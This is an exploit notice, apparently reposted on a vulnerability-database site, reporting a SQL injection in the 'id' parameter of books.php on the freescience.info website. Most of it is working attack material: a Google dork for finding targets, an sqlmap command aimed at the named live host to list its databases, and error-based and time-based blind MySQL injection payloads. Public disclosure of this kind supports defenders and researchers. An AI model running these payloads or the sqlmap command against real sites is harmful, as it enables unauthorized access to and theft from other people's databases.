FREESCIENCE - SQL Injection vulnerability

2020.09.10
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

**************************** #Exploit Title: FREESCIENCE - SQL Injection vulnerability #Date: 2020-09-10 #Exploit Author: Mahdi Karimi #Vendor Homepage: http://freescience.info #Google Dork: books.php?id=2 #Tested On: windows 10 sqlmap: sqlmap -u "http://freescience.info/books.php?id=2" --dbs Testing Method; - error-based - AND/OR time-based blind Parameter: id (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=2 AND (SELECT 1277 FROM(SELECT COUNT(*),CONCAT(0x7162627a71,(SELECT (ELT(1277=1277,1))),0x716a7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=2 AND SLEEP(5) ************************************************** #Discovered by: Mahdi Karimi #Email : mjoker22mjoker22@gmail.com **************************************************


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top